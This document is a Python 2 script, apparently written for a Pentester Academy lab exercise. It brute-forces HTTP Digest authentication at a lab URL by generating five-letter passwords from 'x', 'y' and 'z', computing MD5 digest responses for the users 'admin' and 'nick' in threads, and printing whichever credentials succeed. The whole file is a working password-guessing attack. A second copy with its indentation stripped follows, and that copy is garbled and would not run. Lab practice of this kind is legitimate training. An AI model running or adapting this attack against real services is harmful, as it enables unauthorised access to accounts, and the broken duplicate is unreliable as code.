yesecurity/brute6.py

## brute6.py
from threading import Thread
from httplib2 import Http
import sys
import requests
import md5
import itertools

url = "http://pentesteracademylab.appspot.com/lab/webapp/digest2/1"
listp = []

#Creating Password List
a = list(itertools.product(['x','y','z'], repeat =  5))

for e in a:
    a = ''.join(e)
    listp.append(a)

def brute(user):
    for p in listp :
         zero = Http()

         # The client sends the server a request .
         r = requests.get(url)

         #The server responds by returning an  401 "Unauthorized" response code which include WWW-Authenticate header .
         b = r.headers.get('www-authenticate', '')

         g =b.split(" ")[3].split("nonce=")[1]
         nonce = g[1:-1]
         method = "GET"
         digestURI = "/lab/webapp/digest2/1"
         realm = "Pentester Academy"

         #Compute hash1 = MD5("username:realm:password")
         h1 = (user+":"+realm+":"+p)
         ha1 = (md5.md5(h1).hexdigest())

         #Compute hash2 = MD5("method:digestURI")
         h2 = (method+":"+digestURI)
         ha2 = (md5.md5(h2).hexdigest())

         #Compute hash3 (response) = MD5("ha1:nonce:ha2").
         resp = (ha1+":"+nonce+":"+ha2)
         response = (md5.md5(resp).hexdigest())

         #The client sends the response back to the server in an Authorization header and includes
         #the username, realm, nonce,digestUri and the computed response
         bal = {"Authorization" : 'Digest username="%s", realm="%s", nonce="%s", uri="%s",  response="%s" ' % (user, realm, nonce, digestURI, response)}
         resp , b =  zero.request(url,"GET" ,"",bal)
         b = resp['status']
         if b != "401":
             print "Big Thanks To Pentester Academy !"
             print "User = " + user
             print "Password = " + p
             sys.exit(1)
def main():
   users = ['admin' , 'nick']
   for us in users:
     try:
       user = us
       Thread(target = brute , args = (user,)).start()
     except:
       pass


main()
	from threading import Thread
	from httplib2 import Http
	import sys
	import requests
	import md5
	import itertools

	url = "http://pentesteracademylab.appspot.com/lab/webapp/digest2/1"
	listp = []

	#Creating Password List
	a = list(itertools.product(['x','y','z'], repeat = 5))

	for e in a:
	a = ''.join(e)
	listp.append(a)

	def brute(user):
	for p in listp :
	zero = Http()

	# The client sends the server a request .
	r = requests.get(url)

	#The server responds by returning an 401 "Unauthorized" response code which include WWW-Authenticate header .
	b = r.headers.get('www-authenticate', '')

	g =b.split(" ")[3].split("nonce=")[1]
	nonce = g[1:-1]
	method = "GET"
	digestURI = "/lab/webapp/digest2/1"
	realm = "Pentester Academy"

	#Compute hash1 = MD5("username:realm:password")
	h1 = (user+":"+realm+":"+p)
	ha1 = (md5.md5(h1).hexdigest())

	#Compute hash2 = MD5("method:digestURI")
	h2 = (method+":"+digestURI)
	ha2 = (md5.md5(h2).hexdigest())

	#Compute hash3 (response) = MD5("ha1:nonce:ha2").
	resp = (ha1+":"+nonce+":"+ha2)
	response = (md5.md5(resp).hexdigest())

	#The client sends the response back to the server in an Authorization header and includes
	#the username, realm, nonce,digestUri and the computed response
	bal = {"Authorization" : 'Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s" ' % (user, realm, nonce, digestURI, response)}
	resp , b = zero.request(url,"GET" ,"",bal)
	b = resp['status']
	if b != "401":
	print "Big Thanks To Pentester Academy !"
	print "User = " + user
	print "Password = " + p
	sys.exit(1)
	def main():
	users = ['admin' , 'nick']
	for us in users:
	try:
	user = us
	Thread(target = brute , args = (user,)).start()
	except:
	pass


	main()